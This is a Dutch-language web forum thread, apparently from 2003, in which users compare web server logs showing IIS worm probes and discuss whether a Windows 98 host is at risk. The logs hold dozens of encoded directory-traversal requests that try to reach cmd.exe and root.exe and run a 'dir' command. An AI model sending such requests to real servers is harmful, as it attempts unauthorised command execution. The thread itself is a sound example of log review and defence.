aanval webserver?

[captain]

vond in de bezoek-gegevens van m'n webserver het volgende. is dit een aanval? ik draai 'm onder windows 98 en dit is unix-code:


/62.101.250.98 Jul 12 18:09:34 /default.ida
/62.118.206.249 Jul 12 18:15:07 /default.ida
/80.116.106.60 Jul 12 19:05:49 /default.ida
/62.61.192.22 Jul 12 22:44:06 /scripts/root.exe
/62.61.192.22 Jul 12 22:44:08 /MSADC/root.exe
/62.61.192.22 Jul 12 22:44:12 /c/winnt/system32/cmd.exe
/62.61.192.22 Jul 12 22:44:16 /d/winnt/system32/cmd.exe
/62.61.192.22 Jul 12 22:44:18 /scripts/..%5c../winnt/system32/cmd.exe
/62.61.192.22 Jul 12 22:44:26 /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/62.61.192.22 Jul 12 22:44:34 /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/62.61.192.22 Jul 12 22:44:37 /msadc/..%5c../..%5c../..%5c/..../..../..../winnt/system32/cmd.exe
/62.61.192.22 Jul 12 22:44:41 /scripts/..../winnt/system32/cmd.exe
/62.61.192.22 Jul 12 22:44:43 /scripts/../../winnt/system32/cmd.exe
/62.61.192.22 Jul 12 22:44:46 /scripts/../../winnt/system32/cmd.exe
/62.61.192.22 Jul 12 22:44:49 /scripts/..\../winnt/system32/cmd.exe
/62.61.192.22 Jul 12 22:44:52 /scripts/..5c../winnt/system32/cmd.exe
/62.61.192.22 Jul 12 22:44:58 /scripts/..5c../winnt/system32/cmd.exe

 

[Tiborv]

Ja, dit lijkt op een aanval waarbij de CMD.EXE (command prompt) de zwakke plek vormt. En diegene die rommelt is wel een goeie, hij/zij gebruikt een IP-adres dat niet gedocumenteerd is.

Comment: These addresses have been further assigned to users in the RIPE NCC region

Je hebt mazzel dan Windows98 geen CMD.EXE heeft. Alleen NT versie's hebben dit programma.

 

[captain]

klinkt knap griezelig!

maar kan het ook het NIMDA-virus zijn vanaf een geinfecteerde NT of Unix -server?

http://dbforums.com/arch/183/2002/3/324417

 

[SoF]

Dat is dus de beruchte IIS worm, heb hem ook op mijn NT server logs.
Als je alle updates hebt is er niets aan de hand.

Verder effen gezocht van waar hij komt :
---Last Hub alive ---

OrgName: Teleglobe Inc.
OrgID: GLBE
Address: 1441 Carrie-Derick
City: Montreal
StateProv: QC
PostalCode: H3C-4S9
Country: CA

NetRange: 64.86.0.0 - 64.86.255.255
CIDR: 64.86.0.0/16
NetName: TELEGLOBE
NetHandle: NET-64-86-0-0-1
Parent: NET-64-0-0-0-0
NetType: Direct Allocation
NameServer: CASTOR.TELEGLOBE.NET
NameServer: POLLUX.TELEGLOBE.NET
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate: 2000-05-04
Updated: 2002-07-30

TechHandle: ZT129-ARIN
TechName: Admin, IP
TechPhone: +1-514-868-8308
TechEmail: ip-addr@teleglobe.ca

OrgTechHandle: ZT129-ARIN
OrgTechName: Admin, IP
OrgTechPhone: +1-514-868-8308
OrgTechEmail: ip-addr@teleglobe.ca

ARIN WHOIS database, last updated 2003-07-12 21:05
Enter ? for additional hints on searching ARIN's WHOIS database.

Dus als ie weer langs komt post effe de tijd wil je .

SoF

 

[x4peter]

gebeurd op mijn apache server ook regelmatig:

62.166.146.58 - - [08/Jul/2003:21:37:49 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
62.166.146.58 - - [08/Jul/2003:21:37:49 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
62.166.146.58 - - [08/Jul/2003:21:37:49 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
62.166.146.58 - - [08/Jul/2003:21:37:50 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
62.166.146.58 - - [08/Jul/2003:21:37:50 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
62.166.146.58 - - [08/Jul/2003:21:37:50 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
62.166.146.58 - - [08/Jul/2003:21:37:50 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
62.166.146.58 - - [08/Jul/2003:21:37:51 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
62.166.146.58 - - [08/Jul/2003:21:37:51 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
62.166.146.58 - - [08/Jul/2003:21:37:51 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
62.166.146.58 - - [08/Jul/2003:21:37:51 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
62.166.146.58 - - [08/Jul/2003:21:37:52 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
62.166.146.58 - - [08/Jul/2003:21:37:52 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
62.166.146.58 - - [08/Jul/2003:21:37:52 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
62.166.146.58 - - [08/Jul/2003:21:37:52 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
62.166.146.58 - - [08/Jul/2003:21:37:53 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
62.166.146.58 - - [08/Jul/2003:22:04:20 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
62.166.146.58 - - [08/Jul/2003:22:04:20 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
62.166.146.58 - - [08/Jul/2003:22:04:20 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
62.166.146.58 - - [08/Jul/2003:22:04:21 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
62.166.146.58 - - [08/Jul/2003:22:04:21 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
62.166.146.58 - - [08/Jul/2003:22:04:21 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
62.166.146.58 - - [08/Jul/2003:22:04:21 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
62.166.146.58 - - [08/Jul/2003:22:04:22 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
62.166.146.58 - - [08/Jul/2003:22:04:22 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
62.166.146.58 - - [08/Jul/2003:22:04:22 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
62.166.146.58 - - [08/Jul/2003:22:04:22 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
62.166.146.58 - - [08/Jul/2003:22:04:23 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
62.166.146.58 - - [08/Jul/2003:22:04:23 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
62.166.146.58 - - [08/Jul/2003:22:04:23 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
62.166.146.58 - - [08/Jul/2003:22:04:23 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
62.166.146.58 - - [08/Jul/2003:22:04:24 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
62.166.146.58 - - [08/Jul/2003:22:59:15 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
62.166.146.58 - - [08/Jul/2003:22:59:15 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
62.166.146.58 - - [08/Jul/2003:22:59:16 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
62.166.146.58 - - [08/Jul/2003:22:59:16 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
62.166.146.58 - - [08/Jul/2003:22:59:16 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
62.166.146.58 - - [08/Jul/2003:22:59:17 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
62.166.146.58 - - [08/Jul/2003:22:59:17 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
62.166.146.58 - - [08/Jul/2003:22:59:17 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
62.166.146.58 - - [08/Jul/2003:22:59:18 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
62.166.146.58 - - [08/Jul/2003:22:59:18 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
62.166.146.58 - - [08/Jul/2003:22:59:18 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
62.166.146.58 - - [08/Jul/2003:22:59:18 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
62.166.146.58 - - [08/Jul/2003:22:59:19 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
62.166.146.58 - - [08/Jul/2003:22:59:19 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
62.166.146.58 - - [08/Jul/2003:22:59:19 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
62.166.146.58 - - [08/Jul/2003:22:59:20 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
62.166.146.58 - - [08/Jul/2003:23:04:59 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
62.166.146.58 - - [08/Jul/2003:23:04:59 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
62.166.146.58 - - [08/Jul/2003:23:05:00 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
62.166.146.58 - - [08/Jul/2003:23:05:00 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
62.166.146.58 - - [08/Jul/2003:23:05:00 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
62.166.146.58 - - [08/Jul/2003:23:05:01 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
62.166.146.58 - - [08/Jul/2003:23:05:01 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
62.166.146.58 - - [08/Jul/2003:23:05:01 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
62.166.146.58 - - [08/Jul/2003:23:05:01 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
62.166.146.58 - - [08/Jul/2003:23:05:02 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
62.166.146.58 - - [08/Jul/2003:23:05:02 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
62.166.146.58 - - [08/Jul/2003:23:05:02 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
62.166.146.58 - - [08/Jul/2003:23:05:02 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
62.166.146.58 - - [08/Jul/2003:23:05:03 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
62.166.146.58 - - [08/Jul/2003:23:05:03 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
62.166.255.112 - - [11/Jul/2003:04:35:29 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
62.166.255.112 - - [11/Jul/2003:04:35:30 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
62.166.255.112 - - [11/Jul/2003:04:35:32 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
62.166.255.112 - - [11/Jul/2003:04:35:32 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
62.166.255.112 - - [11/Jul/2003:04:35:32 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
62.166.255.112 - - [11/Jul/2003:04:35:33 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
62.166.255.112 - - [11/Jul/2003:04:35:33 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
62.166.255.112 - - [11/Jul/2003:04:35:34 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
62.166.255.112 - - [11/Jul/2003:04:35:34 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
62.166.255.112 - - [11/Jul/2003:04:35:35 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
62.166.255.112 - - [11/Jul/2003:04:35:35 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
62.166.255.112 - - [11/Jul/2003:04:35:36 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
62.166.255.112 - - [11/Jul/2003:04:35:37 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
62.166.255.112 - - [11/Jul/2003:04:35:41 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
62.166.255.112 - - [11/Jul/2003:04:35:42 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
62.166.255.112 - - [11/Jul/2003:04:35:43 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298

en zo heb ik nog zo'n hele waslijst gebeurd iedere dag een 3 tot 4 keer dat ik dit in log zie staan.

 

[captain]

Bedankt jongens

SoF de aanval was gisteravond (zaterdag) rond 22:45.
Volgens mij ben ik met windows 98 zelfs zonder patch veilig tegen IIS wormen, nietwaar?

 

[nteusink]

Kunnen inderdaad wormen zijn maar ook "gewoon" aanvallen van mensen die niks beters te doen hebben dan willekeurig mensen scannen.

Welke webserver gebruik je?

 

[SoF]

Geplaatst door captain
Bedankt jongens

SoF de aanval was gisteravond (zaterdag) rond 22:45.
Volgens mij ben ik met windows 98 zelfs zonder patch veilig tegen IIS wormen, nietwaar?

ja en nee .....
kijk in de logfile dan zie je dat hij naar de map winnt/..... zoek die heb je dus niet, weet alleen niet uit mijn hoofd of er ook een andere versie van deze worm rond zwerft.
beter is om via www.technet.com te zoeken naar een goed oplossing als die er is.

SoF

 

[saldos]

Geplaatst door captain
Volgens mij ben ik met windows 98 zelfs zonder patch veilig tegen IIS wormen, nietwaar?

Je bent misschien wel veilig tegen IIS wormen als je hem niet gepatched hebt, maar je bent wel kwetsbaar voor andere aanvallen dus ik zou hem maar wel patchen.

 

[captain]

ik ga op zoek. bedankt jongens! :thumb: